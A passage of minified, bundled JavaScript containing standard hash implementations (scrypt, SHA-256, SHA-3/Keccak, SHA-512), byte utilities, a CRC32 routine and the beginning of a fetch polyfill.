                }, t.scryptAsync = async function(e, t, r) {
                    const { N: n, r: i, p: o, dkLen: a, blockSize32: u, V: h, B32: f, B: p, tmp: m, blockMixCb: g, asyncTick: y } = l(e, t, r);
                    for(let e = 0; e < o; e++){
                        const t = u * e;
                        for(let e = 0; e < u; e++)h[e] = f[t + e];
                        let r = 0;
                        await (0, s.asyncLoop)(n - 1, y, (e)=>{
                            c(h, r, h, r += u, i), g();
                        }), c(h, (n - 1) * u, f, t, i), g(), await (0, s.asyncLoop)(n, y, (e)=>{
                            const r = f[t + u - 16] % n;
                            for(let e = 0; e < u; e++)m[e] = f[t + e] ^ h[r * u + e];
                            c(m, 0, f, t, i), g();
                        });
                    }
                    return d(e, a, p, h, m);
                };
            },
            6053: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.sha224 = t.sha256 = void 0;
                const n = r(9350), i = r(64), o = (e, t, r)=>e & t ^ e & r ^ t & r, s = new Uint32Array([
                    1116352408,
                    1899447441,
                    3049323471,
                    3921009573,
                    961987163,
                    1508970993,
                    2453635748,
                    2870763221,
                    3624381080,
                    310598401,
                    607225278,
                    1426881987,
                    1925078388,
                    2162078206,
                    2614888103,
                    3248222580,
                    3835390401,
                    4022224774,
                    264347078,
                    604807628,
                    770255983,
                    1249150122,
                    1555081692,
                    1996064986,
                    2554220882,
                    2821834349,
                    2952996808,
                    3210313671,
                    3336571891,
                    3584528711,
                    113926993,
                    338241895,
                    666307205,
                    773529912,
                    1294757372,
                    1396182291,
                    1695183700,
                    1986661051,
                    2177026350,
                    2456956037,
                    2730485921,
                    2820302411,
                    3259730800,
                    3345764771,
                    3516065817,
                    3600352804,
                    4094571909,
                    275423344,
                    430227734,
                    506948616,
                    659060556,
                    883997877,
                    958139571,
                    1322822218,
                    1537002063,
                    1747873779,
                    1955562222,
                    2024104815,
                    2227730452,
                    2361852424,
                    2428436474,
                    2756734187,
                    3204031479,
                    3329325298
                ]), a = new Uint32Array([
                    1779033703,
                    3144134277,
                    1013904242,
                    2773480762,
                    1359893119,
                    2600822924,
                    528734635,
                    1541459225
                ]), u = new Uint32Array(64);
                class c extends n.SHA2 {
                    constructor(){
                        super(64, 32, 8, !1), this.A = 0 | a[0], this.B = 0 | a[1], this.C = 0 | a[2], this.D = 0 | a[3], this.E = 0 | a[4], this.F = 0 | a[5], this.G = 0 | a[6], this.H = 0 | a[7];
                    }
                    get() {
                        const { A: e, B: t, C: r, D: n, E: i, F: o, G: s, H: a } = this;
                        return [
                            e,
                            t,
                            r,
                            n,
                            i,
                            o,
                            s,
                            a
                        ];
                    }
                    set(e, t, r, n, i, o, s, a) {
                        this.A = 0 | e, this.B = 0 | t, this.C = 0 | r, this.D = 0 | n, this.E = 0 | i, this.F = 0 | o, this.G = 0 | s, this.H = 0 | a;
                    }
                    process(e, t) {
                        for(let r = 0; r < 16; r++, t += 4)u[r] = e.getUint32(t, !1);
                        for(let e = 16; e < 64; e++){
                            const t = u[e - 15], r = u[e - 2], n = (0, i.rotr)(t, 7) ^ (0, i.rotr)(t, 18) ^ t >>> 3, o = (0, i.rotr)(r, 17) ^ (0, i.rotr)(r, 19) ^ r >>> 10;
                            u[e] = o + u[e - 7] + n + u[e - 16] | 0;
                        }
                        let { A: r, B: n, C: a, D: c, E: l, F: d, G: h, H: f } = this;
                        for(let e = 0; e < 64; e++){
                            const t = f + ((0, i.rotr)(l, 6) ^ (0, i.rotr)(l, 11) ^ (0, i.rotr)(l, 25)) + ((p = l) & d ^ ~p & h) + s[e] + u[e] | 0, m = ((0, i.rotr)(r, 2) ^ (0, i.rotr)(r, 13) ^ (0, i.rotr)(r, 22)) + o(r, n, a) | 0;
                            f = h, h = d, d = l, l = c + t | 0, c = a, a = n, n = r, r = t + m | 0;
                        }
                        var p;
                        r = r + this.A | 0, n = n + this.B | 0, a = a + this.C | 0, c = c + this.D | 0, l = l + this.E | 0, d = d + this.F | 0, h = h + this.G | 0, f = f + this.H | 0, this.set(r, n, a, c, l, d, h, f);
                    }
                    roundClean() {
                        u.fill(0);
                    }
                    destroy() {
                        this.set(0, 0, 0, 0, 0, 0, 0, 0), this.buffer.fill(0);
                    }
                }
                class l extends c {
                    constructor(){
                        super(), this.A = -1056596264, this.B = 914150663, this.C = 812702999, this.D = -150054599, this.E = -4191439, this.F = 1750603025, this.G = 1694076839, this.H = -1090891868, this.outputLen = 28;
                    }
                }
                t.sha256 = (0, i.wrapConstructor)(()=>new c), t.sha224 = (0, i.wrapConstructor)(()=>new l);
            },
            125: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.shake256 = t.shake128 = t.keccak_512 = t.keccak_384 = t.keccak_256 = t.keccak_224 = t.sha3_512 = t.sha3_384 = t.sha3_256 = t.sha3_224 = t.Keccak = t.keccakP = void 0;
                const n = r(3525), i = r(1655), o = r(64), [s, a, u] = [
                    [],
                    [],
                    []
                ], c = BigInt(0), l = BigInt(1), d = BigInt(2), h = BigInt(7), f = BigInt(256), p = BigInt(113);
                for(let e = 0, t = l, r = 1, n = 0; e < 24; e++){
                    [r, n] = [
                        n,
                        (2 * r + 3 * n) % 5
                    ], s.push(2 * (5 * n + r)), a.push((e + 1) * (e + 2) / 2 % 64);
                    let i = c;
                    for(let e = 0; e < 7; e++)t = (t << l ^ (t >> h) * p) % f, t & d && (i ^= l << (l << BigInt(e)) - l);
                    u.push(i);
                }
                const [m, g] = i.default.split(u, !0), y = (e, t, r)=>r > 32 ? i.default.rotlBH(e, t, r) : i.default.rotlSH(e, t, r), v = (e, t, r)=>r > 32 ? i.default.rotlBL(e, t, r) : i.default.rotlSL(e, t, r);
                function b(e, t = 24) {
                    const r = new Uint32Array(10);
                    for(let n = 24 - t; n < 24; n++){
                        for(let t = 0; t < 10; t++)r[t] = e[t] ^ e[t + 10] ^ e[t + 20] ^ e[t + 30] ^ e[t + 40];
                        for(let t = 0; t < 10; t += 2){
                            const n = (t + 8) % 10, i = (t + 2) % 10, o = r[i], s = r[i + 1], a = y(o, s, 1) ^ r[n], u = v(o, s, 1) ^ r[n + 1];
                            for(let r = 0; r < 50; r += 10)e[t + r] ^= a, e[t + r + 1] ^= u;
                        }
                        let t = e[2], i = e[3];
                        for(let r = 0; r < 24; r++){
                            const n = a[r], o = y(t, i, n), u = v(t, i, n), c = s[r];
                            t = e[c], i = e[c + 1], e[c] = o, e[c + 1] = u;
                        }
                        for(let t = 0; t < 50; t += 10){
                            for(let n = 0; n < 10; n++)r[n] = e[t + n];
                            for(let n = 0; n < 10; n++)e[t + n] ^= ~r[(n + 2) % 10] & r[(n + 4) % 10];
                        }
                        e[0] ^= m[n], e[1] ^= g[n];
                    }
                    r.fill(0);
                }
                t.keccakP = b;
                class E extends o.Hash {
                    constructor(e, t, r, i = !1, s = 24){
                        if (super(), this.blockLen = e, this.suffix = t, this.outputLen = r, this.enableXOF = i, this.rounds = s, this.pos = 0, this.posOut = 0, this.finished = !1, this.destroyed = !1, n.default.number(r), 0 >= this.blockLen || this.blockLen >= 200) throw new Error("Sha3 supports only keccak-f1600 function");
                        this.state = new Uint8Array(200), this.state32 = (0, o.u32)(this.state);
                    }
                    keccak() {
                        b(this.state32, this.rounds), this.posOut = 0, this.pos = 0;
                    }
                    update(e) {
                        n.default.exists(this);
                        const { blockLen: t, state: r } = this, i = (e = (0, o.toBytes)(e)).length;
                        for(let n = 0; n < i;){
                            const o = Math.min(t - this.pos, i - n);
                            for(let t = 0; t < o; t++)r[this.pos++] ^= e[n++];
                            this.pos === t && this.keccak();
                        }
                        return this;
                    }
                    finish() {
                        if (this.finished) return;
                        this.finished = !0;
                        const { state: e, suffix: t, pos: r, blockLen: n } = this;
                        e[r] ^= t, 0 != (128 & t) && r === n - 1 && this.keccak(), e[n - 1] ^= 128, this.keccak();
                    }
                    writeInto(e) {
                        n.default.exists(this, !1), n.default.bytes(e), this.finish();
                        const t = this.state, { blockLen: r } = this;
                        for(let n = 0, i = e.length; n < i;){
                            this.posOut >= r && this.keccak();
                            const o = Math.min(r - this.posOut, i - n);
                            e.set(t.subarray(this.posOut, this.posOut + o), n), this.posOut += o, n += o;
                        }
                        return e;
                    }
                    xofInto(e) {
                        if (!this.enableXOF) throw new Error("XOF is not possible for this instance");
                        return this.writeInto(e);
                    }
                    xof(e) {
                        return n.default.number(e), this.xofInto(new Uint8Array(e));
                    }
                    digestInto(e) {
                        if (n.default.output(e, this), this.finished) throw new Error("digest() was already called");
                        return this.writeInto(e), this.destroy(), e;
                    }
                    digest() {
                        return this.digestInto(new Uint8Array(this.outputLen));
                    }
                    destroy() {
                        this.destroyed = !0, this.state.fill(0);
                    }
                    _cloneInto(e) {
                        const { blockLen: t, suffix: r, outputLen: n, rounds: i, enableXOF: o } = this;
                        return e || (e = new E(t, r, n, o, i)), e.state32.set(this.state32), e.pos = this.pos, e.posOut = this.posOut, e.finished = this.finished, e.rounds = i, e.suffix = r, e.outputLen = n, e.enableXOF = o, e.destroyed = this.destroyed, e;
                    }
                }
                t.Keccak = E;
                const A = (e, t, r)=>(0, o.wrapConstructor)(()=>new E(t, e, r));
                t.sha3_224 = A(6, 144, 28), t.sha3_256 = A(6, 136, 32), t.sha3_384 = A(6, 104, 48), t.sha3_512 = A(6, 72, 64), t.keccak_224 = A(1, 144, 28), t.keccak_256 = A(1, 136, 32), t.keccak_384 = A(1, 104, 48), t.keccak_512 = A(1, 72, 64);
                const _ = (e, t, r)=>(0, o.wrapConstructorWithOpts)((n = {})=>new E(t, e, void 0 === n.dkLen ? r : n.dkLen, !0));
                t.shake128 = _(31, 168, 16), t.shake256 = _(31, 136, 32);
            },
            2540: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.sha384 = t.sha512_256 = t.sha512_224 = t.sha512 = t.SHA512 = void 0;
                const n = r(9350), i = r(1655), o = r(64), [s, a] = i.default.split([
                    "0x428a2f98d728ae22",
                    "0x7137449123ef65cd",
                    "0xb5c0fbcfec4d3b2f",
                    "0xe9b5dba58189dbbc",
                    "0x3956c25bf348b538",
                    "0x59f111f1b605d019",
                    "0x923f82a4af194f9b",
                    "0xab1c5ed5da6d8118",
                    "0xd807aa98a3030242",
                    "0x12835b0145706fbe",
                    "0x243185be4ee4b28c",
                    "0x550c7dc3d5ffb4e2",
                    "0x72be5d74f27b896f",
                    "0x80deb1fe3b1696b1",
                    "0x9bdc06a725c71235",
                    "0xc19bf174cf692694",
                    "0xe49b69c19ef14ad2",
                    "0xefbe4786384f25e3",
                    "0x0fc19dc68b8cd5b5",
                    "0x240ca1cc77ac9c65",
                    "0x2de92c6f592b0275",
                    "0x4a7484aa6ea6e483",
                    "0x5cb0a9dcbd41fbd4",
                    "0x76f988da831153b5",
                    "0x983e5152ee66dfab",
                    "0xa831c66d2db43210",
                    "0xb00327c898fb213f",
                    "0xbf597fc7beef0ee4",
                    "0xc6e00bf33da88fc2",
                    "0xd5a79147930aa725",
                    "0x06ca6351e003826f",
                    "0x142929670a0e6e70",
                    "0x27b70a8546d22ffc",
                    "0x2e1b21385c26c926",
                    "0x4d2c6dfc5ac42aed",
                    "0x53380d139d95b3df",
                    "0x650a73548baf63de",
                    "0x766a0abb3c77b2a8",
                    "0x81c2c92e47edaee6",
                    "0x92722c851482353b",
                    "0xa2bfe8a14cf10364",
                    "0xa81a664bbc423001",
                    "0xc24b8b70d0f89791",
                    "0xc76c51a30654be30",
                    "0xd192e819d6ef5218",
                    "0xd69906245565a910",
                    "0xf40e35855771202a",
                    "0x106aa07032bbd1b8",
                    "0x19a4c116b8d2d0c8",
                    "0x1e376c085141ab53",
                    "0x2748774cdf8eeb99",
                    "0x34b0bcb5e19b48a8",
                    "0x391c0cb3c5c95a63",
                    "0x4ed8aa4ae3418acb",
                    "0x5b9cca4f7763e373",
                    "0x682e6ff3d6b2b8a3",
                    "0x748f82ee5defb2fc",
                    "0x78a5636f43172f60",
                    "0x84c87814a1f0ab72",
                    "0x8cc702081a6439ec",
                    "0x90befffa23631e28",
                    "0xa4506cebde82bde9",
                    "0xbef9a3f7b2c67915",
                    "0xc67178f2e372532b",
                    "0xca273eceea26619c",
                    "0xd186b8c721c0c207",
                    "0xeada7dd6cde0eb1e",
                    "0xf57d4f7fee6ed178",
                    "0x06f067aa72176fba",
                    "0x0a637dc5a2c898a6",
                    "0x113f9804bef90dae",
                    "0x1b710b35131c471b",
                    "0x28db77f523047d84",
                    "0x32caab7b40c72493",
                    "0x3c9ebe0a15c9bebc",
                    "0x431d67c49c100d4c",
                    "0x4cc5d4becb3e42b6",
                    "0x597f299cfc657e2a",
                    "0x5fcb6fab3ad6faec",
                    "0x6c44198c4a475817"
                ].map((e)=>BigInt(e))), u = new Uint32Array(80), c = new Uint32Array(80);
                class l extends n.SHA2 {
                    constructor(){
                        super(128, 64, 16, !1), this.Ah = 1779033703, this.Al = -205731576, this.Bh = -1150833019, this.Bl = -2067093701, this.Ch = 1013904242, this.Cl = -23791573, this.Dh = -1521486534, this.Dl = 1595750129, this.Eh = 1359893119, this.El = -1377402159, this.Fh = -1694144372, this.Fl = 725511199, this.Gh = 528734635, this.Gl = -79577749, this.Hh = 1541459225, this.Hl = 327033209;
                    }
                    get() {
                        const { Ah: e, Al: t, Bh: r, Bl: n, Ch: i, Cl: o, Dh: s, Dl: a, Eh: u, El: c, Fh: l, Fl: d, Gh: h, Gl: f, Hh: p, Hl: m } = this;
                        return [
                            e,
                            t,
                            r,
                            n,
                            i,
                            o,
                            s,
                            a,
                            u,
                            c,
                            l,
                            d,
                            h,
                            f,
                            p,
                            m
                        ];
                    }
                    set(e, t, r, n, i, o, s, a, u, c, l, d, h, f, p, m) {
                        this.Ah = 0 | e, this.Al = 0 | t, this.Bh = 0 | r, this.Bl = 0 | n, this.Ch = 0 | i, this.Cl = 0 | o, this.Dh = 0 | s, this.Dl = 0 | a, this.Eh = 0 | u, this.El = 0 | c, this.Fh = 0 | l, this.Fl = 0 | d, this.Gh = 0 | h, this.Gl = 0 | f, this.Hh = 0 | p, this.Hl = 0 | m;
                    }
                    process(e, t) {
                        for(let r = 0; r < 16; r++, t += 4)u[r] = e.getUint32(t), c[r] = e.getUint32(t += 4);
                        for(let e = 16; e < 80; e++){
                            const t = 0 | u[e - 15], r = 0 | c[e - 15], n = i.default.rotrSH(t, r, 1) ^ i.default.rotrSH(t, r, 8) ^ i.default.shrSH(t, r, 7), o = i.default.rotrSL(t, r, 1) ^ i.default.rotrSL(t, r, 8) ^ i.default.shrSL(t, r, 7), s = 0 | u[e - 2], a = 0 | c[e - 2], l = i.default.rotrSH(s, a, 19) ^ i.default.rotrBH(s, a, 61) ^ i.default.shrSH(s, a, 6), d = i.default.rotrSL(s, a, 19) ^ i.default.rotrBL(s, a, 61) ^ i.default.shrSL(s, a, 6), h = i.default.add4L(o, d, c[e - 7], c[e - 16]), f = i.default.add4H(h, n, l, u[e - 7], u[e - 16]);
                            u[e] = 0 | f, c[e] = 0 | h;
                        }
                        let { Ah: r, Al: n, Bh: o, Bl: l, Ch: d, Cl: h, Dh: f, Dl: p, Eh: m, El: g, Fh: y, Fl: v, Gh: b, Gl: E, Hh: A, Hl: _ } = this;
                        for(let e = 0; e < 80; e++){
                            const t = i.default.rotrSH(m, g, 14) ^ i.default.rotrSH(m, g, 18) ^ i.default.rotrBH(m, g, 41), w = i.default.rotrSL(m, g, 14) ^ i.default.rotrSL(m, g, 18) ^ i.default.rotrBL(m, g, 41), T = m & y ^ ~m & b, R = g & v ^ ~g & E, I = i.default.add5L(_, w, R, a[e], c[e]), S = i.default.add5H(I, A, t, T, s[e], u[e]), P = 0 | I, O = i.default.rotrSH(r, n, 28) ^ i.default.rotrBH(r, n, 34) ^ i.default.rotrBH(r, n, 39), x = i.default.rotrSL(r, n, 28) ^ i.default.rotrBL(r, n, 34) ^ i.default.rotrBL(r, n, 39), M = r & o ^ r & d ^ o & d, B = n & l ^ n & h ^ l & h;
                            A = 0 | b, _ = 0 | E, b = 0 | y, E = 0 | v, y = 0 | m, v = 0 | g, ({ h: m, l: g } = i.default.add(0 | f, 0 | p, 0 | S, 0 | P)), f = 0 | d, p = 0 | h, d = 0 | o, h = 0 | l, o = 0 | r, l = 0 | n;
                            const N = i.default.add3L(P, x, B);
                            r = i.default.add3H(N, S, O, M), n = 0 | N;
                        }
                        ({ h: r, l: n } = i.default.add(0 | this.Ah, 0 | this.Al, 0 | r, 0 | n)), ({ h: o, l: l } = i.default.add(0 | this.Bh, 0 | this.Bl, 0 | o, 0 | l)), ({ h: d, l: h } = i.default.add(0 | this.Ch, 0 | this.Cl, 0 | d, 0 | h)), ({ h: f, l: p } = i.default.add(0 | this.Dh, 0 | this.Dl, 0 | f, 0 | p)), ({ h: m, l: g } = i.default.add(0 | this.Eh, 0 | this.El, 0 | m, 0 | g)), ({ h: y, l: v } = i.default.add(0 | this.Fh, 0 | this.Fl, 0 | y, 0 | v)), ({ h: b, l: E } = i.default.add(0 | this.Gh, 0 | this.Gl, 0 | b, 0 | E)), ({ h: A, l: _ } = i.default.add(0 | this.Hh, 0 | this.Hl, 0 | A, 0 | _)), this.set(r, n, o, l, d, h, f, p, m, g, y, v, b, E, A, _);
                    }
                    roundClean() {
                        u.fill(0), c.fill(0);
                    }
                    destroy() {
                        this.buffer.fill(0), this.set(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0);
                    }
                }
                t.SHA512 = l;
                class d extends l {
                    constructor(){
                        super(), this.Ah = -1942145080, this.Al = 424955298, this.Bh = 1944164710, this.Bl = -1982016298, this.Ch = 502970286, this.Cl = 855612546, this.Dh = 1738396948, this.Dl = 1479516111, this.Eh = 258812777, this.El = 2077511080, this.Fh = 2011393907, this.Fl = 79989058, this.Gh = 1067287976, this.Gl = 1780299464, this.Hh = 286451373, this.Hl = -1848208735, this.outputLen = 28;
                    }
                }
                class h extends l {
                    constructor(){
                        super(), this.Ah = 573645204, this.Al = -64227540, this.Bh = -1621794909, this.Bl = -934517566, this.Ch = 596883563, this.Cl = 1867755857, this.Dh = -1774684391, this.Dl = 1497426621, this.Eh = -1775747358, this.El = -1467023389, this.Fh = -1101128155, this.Fl = 1401305490, this.Gh = 721525244, this.Gl = 746961066, this.Hh = 246885852, this.Hl = -2117784414, this.outputLen = 32;
                    }
                }
                class f extends l {
                    constructor(){
                        super(), this.Ah = -876896931, this.Al = -1056596264, this.Bh = 1654270250, this.Bl = 914150663, this.Ch = -1856437926, this.Cl = 812702999, this.Dh = 355462360, this.Dl = -150054599, this.Eh = 1731405415, this.El = -4191439, this.Fh = -1900787065, this.Fl = 1750603025, this.Gh = -619958771, this.Gl = 1694076839, this.Hh = 1203062813, this.Hl = -1090891868, this.outputLen = 48;
                    }
                }
                t.sha512 = (0, o.wrapConstructor)(()=>new l), t.sha512_224 = (0, o.wrapConstructor)(()=>new d), t.sha512_256 = (0, o.wrapConstructor)(()=>new h), t.sha384 = (0, o.wrapConstructor)(()=>new f);
            },
            64: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.randomBytes = t.wrapConstructorWithOpts = t.wrapConstructor = t.checkOpts = t.Hash = t.concatBytes = t.toBytes = t.utf8ToBytes = t.asyncLoop = t.nextTick = t.hexToBytes = t.bytesToHex = t.isLE = t.rotr = t.createView = t.u32 = t.u8 = void 0;
                const n = r(825);
                if (t.u8 = (e)=>new Uint8Array(e.buffer, e.byteOffset, e.byteLength), t.u32 = (e)=>new Uint32Array(e.buffer, e.byteOffset, Math.floor(e.byteLength / 4)), t.createView = (e)=>new DataView(e.buffer, e.byteOffset, e.byteLength), t.rotr = (e, t)=>e << 32 - t | e >>> t, t.isLE = 68 === new Uint8Array(new Uint32Array([
                    287454020
                ]).buffer)[0], !t.isLE) throw new Error("Non little-endian hardware is not supported");
                const i = Array.from({
                    length: 256
                }, (e, t)=>t.toString(16).padStart(2, "0"));
                function o(e) {
                    if ("string" != typeof e) throw new TypeError("utf8ToBytes expected string, got " + typeof e);
                    return (new TextEncoder).encode(e);
                }
                function s(e) {
                    if ("string" == typeof e && (e = o(e)), !(e instanceof Uint8Array)) throw new TypeError(`Expected input type is Uint8Array (got ${typeof e})`);
                    return e;
                }
                t.bytesToHex = function(e) {
                    if (!(e instanceof Uint8Array)) throw new Error("Uint8Array expected");
                    let t = "";
                    for(let r = 0; r < e.length; r++)t += i[e[r]];
                    return t;
                }, t.hexToBytes = function(e) {
                    if ("string" != typeof e) throw new TypeError("hexToBytes: expected string, got " + typeof e);
                    if (e.length % 2) throw new Error("hexToBytes: received invalid unpadded hex");
                    const t = new Uint8Array(e.length / 2);
                    for(let r = 0; r < t.length; r++){
                        const n = 2 * r, i = e.slice(n, n + 2), o = Number.parseInt(i, 16);
                        if (Number.isNaN(o) || o < 0) throw new Error("Invalid byte sequence");
                        t[r] = o;
                    }
                    return t;
                }, t.nextTick = async ()=>{}, t.asyncLoop = async function(e, r, n) {
                    let i = Date.now();
                    for(let o = 0; o < e; o++){
                        n(o);
                        const e = Date.now() - i;
                        e >= 0 && e < r || (await (0, t.nextTick)(), i += e);
                    }
                }, t.utf8ToBytes = o, t.toBytes = s, t.concatBytes = function(...e) {
                    if (!e.every((e)=>e instanceof Uint8Array)) throw new Error("Uint8Array list expected");
                    if (1 === e.length) return e[0];
                    const t = e.reduce((e, t)=>e + t.length, 0), r = new Uint8Array(t);
                    for(let t = 0, n = 0; t < e.length; t++){
                        const i = e[t];
                        r.set(i, n), n += i.length;
                    }
                    return r;
                }, t.Hash = class {
                    clone() {
                        return this._cloneInto();
                    }
                }, t.checkOpts = function(e, t) {
                    if (void 0 !== t && ("object" != typeof t || (r = t, "[object Object]" !== Object.prototype.toString.call(r) || r.constructor !== Object))) throw new TypeError("Options should be object or undefined");
                    var r;
                    return Object.assign(e, t);
                }, t.wrapConstructor = function(e) {
                    const t = (t)=>e().update(s(t)).digest(), r = e();
                    return t.outputLen = r.outputLen, t.blockLen = r.blockLen, t.create = ()=>e(), t;
                }, t.wrapConstructorWithOpts = function(e) {
                    const t = (t, r)=>e(r).update(s(t)).digest(), r = e({});
                    return t.outputLen = r.outputLen, t.blockLen = r.blockLen, t.create = (t)=>e(t), t;
                }, t.randomBytes = function(e = 32) {
                    if (n.crypto && "function" == typeof n.crypto.getRandomValues) return n.crypto.getRandomValues(new Uint8Array(e));
                    throw new Error("crypto.getRandomValues must be defined");
                };
            },
            2680: (e, t, r)=>{
                "use strict";
                var n = r(7286), i = r(9429), o = i(n("String.prototype.indexOf"));
                e.exports = function(e, t) {
                    var r = n(e, !!t);
                    return "function" == typeof r && o(e, ".prototype.") > -1 ? i(r) : r;
                };
            },
            9429: (e, t, r)=>{
                "use strict";
                var n = r(4090), i = r(7286), o = i("%Function.prototype.apply%"), s = i("%Function.prototype.call%"), a = i("%Reflect.apply%", !0) || n.call(s, o), u = i("%Object.getOwnPropertyDescriptor%", !0), c = i("%Object.defineProperty%", !0), l = i("%Math.max%");
                if (c) try {
                    c({}, "a", {
                        value: 1
                    });
                } catch (e) {
                    c = null;
                }
                e.exports = function(e) {
                    var t = a(n, s, arguments);
                    if (u && c) {
                        var r = u(t, "length");
                        r.configurable && c(t, "length", {
                            value: 1 + l(0, e.length - (arguments.length - 1))
                        });
                    }
                    return t;
                };
                var d = function() {
                    return a(n, o, arguments);
                };
                c ? c(e.exports, "apply", {
                    value: d
                }) : e.exports.apply = d;
            },
            1238: (e, t)=>{
                var r;
                r = function(e) {
                    e.version = "1.2.2";
                    var t = function() {
                        for(var e = 0, t = new Array(256), r = 0; 256 != r; ++r)e = 1 & (e = 1 & (e = 1 & (e = 1 & (e = 1 & (e = 1 & (e = 1 & (e = 1 & (e = r) ? -306674912 ^ e >>> 1 : e >>> 1) ? -306674912 ^ e >>> 1 : e >>> 1) ? -306674912 ^ e >>> 1 : e >>> 1) ? -306674912 ^ e >>> 1 : e >>> 1) ? -306674912 ^ e >>> 1 : e >>> 1) ? -306674912 ^ e >>> 1 : e >>> 1) ? -306674912 ^ e >>> 1 : e >>> 1) ? -306674912 ^ e >>> 1 : e >>> 1, t[r] = e;
                        return "undefined" != typeof Int32Array ? new Int32Array(t) : t;
                    }(), r = function(e) {
                        var t = 0, r = 0, n = 0, i = "undefined" != typeof Int32Array ? new Int32Array(4096) : new Array(4096);
                        for(n = 0; 256 != n; ++n)i[n] = e[n];
                        for(n = 0; 256 != n; ++n)for(r = e[n], t = 256 + n; t < 4096; t += 256)r = i[t] = r >>> 8 ^ e[255 & r];
                        var o = [];
                        for(n = 1; 16 != n; ++n)o[n - 1] = "undefined" != typeof Int32Array ? i.subarray(256 * n, 256 * n + 256) : i.slice(256 * n, 256 * n + 256);
                        return o;
                    }(t), n = r[0], i = r[1], o = r[2], s = r[3], a = r[4], u = r[5], c = r[6], l = r[7], d = r[8], h = r[9], f = r[10], p = r[11], m = r[12], g = r[13], y = r[14];
                    e.table = t, e.bstr = function(e, r) {
                        for(var n = -1 ^ r, i = 0, o = e.length; i < o;)n = n >>> 8 ^ t[255 & (n ^ e.charCodeAt(i++))];
                        return ~n;
                    }, e.buf = function(e, r) {
                        for(var v = -1 ^ r, b = e.length - 15, E = 0; E < b;)v = y[e[E++] ^ 255 & v] ^ g[e[E++] ^ v >> 8 & 255] ^ m[e[E++] ^ v >> 16 & 255] ^ p[e[E++] ^ v >>> 24] ^ f[e[E++]] ^ h[e[E++]] ^ d[e[E++]] ^ l[e[E++]] ^ c[e[E++]] ^ u[e[E++]] ^ a[e[E++]] ^ s[e[E++]] ^ o[e[E++]] ^ i[e[E++]] ^ n[e[E++]] ^ t[e[E++]];
                        for(b += 15; E < b;)v = v >>> 8 ^ t[255 & (v ^ e[E++])];
                        return ~v;
                    }, e.str = function(e, r) {
                        for(var n = -1 ^ r, i = 0, o = e.length, s = 0, a = 0; i < o;)(s = e.charCodeAt(i++)) < 128 ? n = n >>> 8 ^ t[255 & (n ^ s)] : s < 2048 ? n = (n = n >>> 8 ^ t[255 & (n ^ (192 | s >> 6 & 31))]) >>> 8 ^ t[255 & (n ^ (128 | 63 & s))] : s >= 55296 && s < 57344 ? (s = 64 + (1023 & s), a = 1023 & e.charCodeAt(i++), n = (n = (n = (n = n >>> 8 ^ t[255 & (n ^ (240 | s >> 8 & 7))]) >>> 8 ^ t[255 & (n ^ (128 | s >> 2 & 63))]) >>> 8 ^ t[255 & (n ^ (128 | a >> 6 & 15 | (3 & s) << 4))]) >>> 8 ^ t[255 & (n ^ (128 | 63 & a))]) : n = (n = (n = n >>> 8 ^ t[255 & (n ^ (224 | s >> 12 & 15))]) >>> 8 ^ t[255 & (n ^ (128 | s >> 6 & 63))]) >>> 8 ^ t[255 & (n ^ (128 | 63 & s))];
                        return ~n;
                    };
                }, "undefined" == typeof DO_NOT_EXPORT_CRC ? r(t) : r({});
            },
            6279: function(e, t) {
                var r = "undefined" != typeof self ? self : this, n = function() {
                    function e() {
                        this.fetch = !1, this.DOMException = r.DOMException;
                    }
                    return e.prototype = r, new e;
                }();
                !function(e) {
                    !function(t) {
                        var r = "URLSearchParams" in e, n = "Symbol" in e && "iterator" in Symbol, i = "FileReader" in e && "Blob" in e && function() {
                            try {
                                return new Blob, !0;
                            } catch (e) {
                                return !1;
                            }
                        }(), o = "FormData" in e, s = "ArrayBuffer" in e;
                        if (s) var a = [
                            "[object Int8Array]",
                            "[object Uint8Array]",
                            "[object Uint8ClampedArray]",
                            "[object Int16Array]",
                            "[object Uint16Array]",
                            "[object Int32Array]",
                            "[object Uint32Array]",
                            "[object Float32Array]",
                            "[object Float64Array]"
                        ], u = ArrayBuffer.isView || function(e) {
                            return e && a.indexOf(Object.prototype.toString.call(e)) > -1;
                        };
                        function c(e) {
                            if ("string" != typeof e && (e = String(e)), /[^a-z0-9\-#$%&'*+.^_`|~]/i.test(e)) throw new TypeError("Invalid character in header field name");
                            return e.toLowerCase();
                        }
                        function l(e) {
                            return "string" != typeof e && (e = String(e)), e;
                        }
                        function d(e) {
                            var t = {
                                next: function() {
                                    var t = e.shift();
                                    return {
                                        done: void 0 === t,
                                        value: t
                                    };
                                }
                            };
                            return n && (t[Symbol.iterator] = function() {
                                return t;
                            }), t;
                        }
                        function h(e) {
                            this.map = {}, e instanceof h ? e.forEach(function(e, t) {
                                this.append(t, e);
                            }, this) : Array.isArray(e) ? e.forEach(function(e) {
                                this.append(e[0], e[1]);
                            }, this) : e && Object.getOwnPropertyNames(e).forEach(function(t) {
                                this.append(t, e[t]);
                            }, this);
                        }
                        function f(e) {
                            if (e.bodyUsed) return Promise.reject(new TypeError("Already read"));
                            e.bodyUsed = !0;
                        }
                        function p(e) {
                            return new Promise(function(t, r) {
                                e.onload = function() {
                                    t(e.result);
                                }, e.onerror = function() {
                                    r(e.error);
                                };
                            });
                        }
                        function m(e) {
                            var t = new FileReader, r = p(t);
                            return t.readAsArrayBuffer(e), r;
                        }
                        function g(e) {
                            if (e.slice) return e.slice(0);
                            var t = new Uint8Array(e.byteLength);
                            return t.set(new Uint8Array(e)), t.buffer;
                        }
                        function y() {
                            return this.bodyUsed = !1, this._initBody = function(e) {
                                var t;
                                this._bodyInit = e, e ? "string" == typeof e ? this._bodyText = e : i && Blob.prototype.isPrototypeOf(e) ? this._bodyBlob = e : o && FormData.prototype.isPrototypeOf(e) ? this._bodyFormData = e : r && URLSearchParams.prototype.isPrototypeOf(e) ? this._bodyText = e.toString() : s && i && (t = e) && DataView.prototype.isPrototypeOf(t) ? (this._bodyArrayBuffer = g(e.buffer), this._bodyInit = new Blob([
                                    this._bodyArrayBuffer
